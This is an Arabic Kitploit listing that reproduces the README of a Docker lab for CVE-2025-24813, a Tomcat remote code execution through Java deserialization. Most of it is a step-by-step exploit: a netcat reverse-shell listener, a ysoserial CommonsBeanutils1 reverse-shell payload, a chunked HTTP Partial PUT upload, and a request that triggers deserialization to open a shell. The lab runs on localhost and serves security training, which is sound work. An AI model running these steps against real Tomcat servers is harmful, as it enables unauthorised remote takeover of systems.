Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24813 — Session Exploit | Kitploit
أدوات/GitHubGitHub/beyond-devsecops/cve-2025-24813
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعداستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubbeyond-devsecops/cve-2025-24813

CVE-2025-24813

Session Exploit

4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

tags: [tomcat, cve-2025-24813, java, rce, reverse-shell, lab] title: 🧪 CVE-2025-24813 Tomcat RCE Lab (Docker + ysoserial)

🧪 مختبر CVE-2025-24813 Tomcat RCE (Docker + ysoserial)

يعرض هذا المختبر تنفيذ الأوامر عن بُعد عبر إلغاء التسلسل غير الآمن في Java داخل تطبيق مستضاف على Tomcat يعالج ملفات الجلسات المتسلسلة. تعمل البيئة بأكملها داخل Docker مع حمولة Reverse Shell مصممة خصيصًا تُرسَل عبر طلب Partial PUT.


📁 هيكل الدليل

root@kitploit:~
.
├── 0-run-tomcat.sh        # Build + run vulnerable Tomcat container
├── 1-generate-revshell.sh # Start Netcat reverse shell listener
├── 2-generate-payload.sh  # Generate ysoserial reverse shell payload
├── 3-upload-file.sh       # Upload serialized payload via Partial PUT
├── 4-exploit.sh           # Trigger deserialization endpoint
├── readme.md              # This file
├── source.sh              # Sets CALLBACK_IP, LISTENER_PORT, etc
├── dummy-app/
│   ├── src/
│   │   └── main/java/com/example/DeserializeServlet.java
│   ├── pom.xml
│   └── Dockerfile

⚙️ المتطلبات الأساسية

ثبّت Java و Netcat:

root@kitploit:~
brew install openjdk netcat

تأكد من استخدام JDK 11+ والسماح بالوصول غير الآمن للوحدات عبر --add-opens.


🧨 خطوات الاستغلال

  1. 🛠 بناء وتشغيل Tomcat القابل للاستغلال
  2. 🐚 تشغيل مستمع Reverse Shell
  3. 💣 توليد حمولة ysoserial (CommonsBeanutils1)
  4. 📤 رفع الحمولة باستخدام HTTP Partial PUT
  5. 🎯 تفعيل إلغاء التسلسل والاستيلاء على الصدفة

🧪 الاستخدام

1. بناء وتشغيل Tomcat القابل للاستغلال

root@kitploit:~
bash 0-run-tomcat.sh

2. تعيين متغيرات البيئة

أنشئ ملف source.sh على هذا النحو:

root@kitploit:~
export CALLBACK_IP="your.lan.ip"
export LISTENER_PORT=4444
export PAYLOAD_FILE="rev_shell.ser"
export TARGET_URL="http://localhost:8080/xxx-api/gopan.session"
export CHUNK_SIZE=100

ثم قم بتضمينه (source):

root@kitploit:~
source source.sh

3. تشغيل مستمع Reverse Shell

في طرفية منفصلة:

root@kitploit:~
bash 1-generate-revshell.sh

وهذا يشغّل:

root@kitploit:~
nc -lnvp 4444

4. توليد الحمولة

root@kitploit:~
bash 2-generate-payload.sh

سيقوم هذا بـ:

  • تنزيل ysoserial.jar إذا لزم الأمر
  • توليد حمولة CommonsBeanutils1 مع Reverse Shell
  • حفظها باسم rev_shell.ser

5. رفع الحمولة

root@kitploit:~
bash 3-upload-file.sh

ينفّذ هذا السكربت رفعًا عبر HTTP Partial PUT على دفعات باستخدام ترويسات Content-Range.


6. تفعيل الاستغلال

root@kitploit:~
bash 4-exploit.sh

يستهدف هذا:

root@kitploit:~
http://localhost:8080/xxx-api/profile

والذي يلغي تسلسل الملف المرفوع وينفّذ الحمولة.

✅ ستحصل على Reverse Shell في طرفية Netcat!


🔍 تصحيح الأخطاء

داخل الحاوية:

root@kitploit:~
docker exec -it vulnerable-tomcat bash
cd /usr/local/tomcat/webapps/xxx-api/
ls -l

تحقق من وجود الملف /tmp/beanutils-worked إذا كنت تختبر بحمولة آمنة.


💡 ملاحظات

  • تتطلب الحمولات --add-opens لتجاوز قيود الوحدات في Java 11+
  • قد يفشل Reverse Shell بصمت إذا لم يتوفر /bin/bash (جرّب /bin/sh)
  • يمكنك اختبار تنفيذ الأكواد بأمان باستخدام: touch /tmp/rce-worked

🧱 مبني على

  • frohoff/ysoserial
  • Apache Tomcat 9.x
  • سلاسل استغلال إلغاء التسلسل في Java (CommonsBeanutils1)

تنزيل الأداة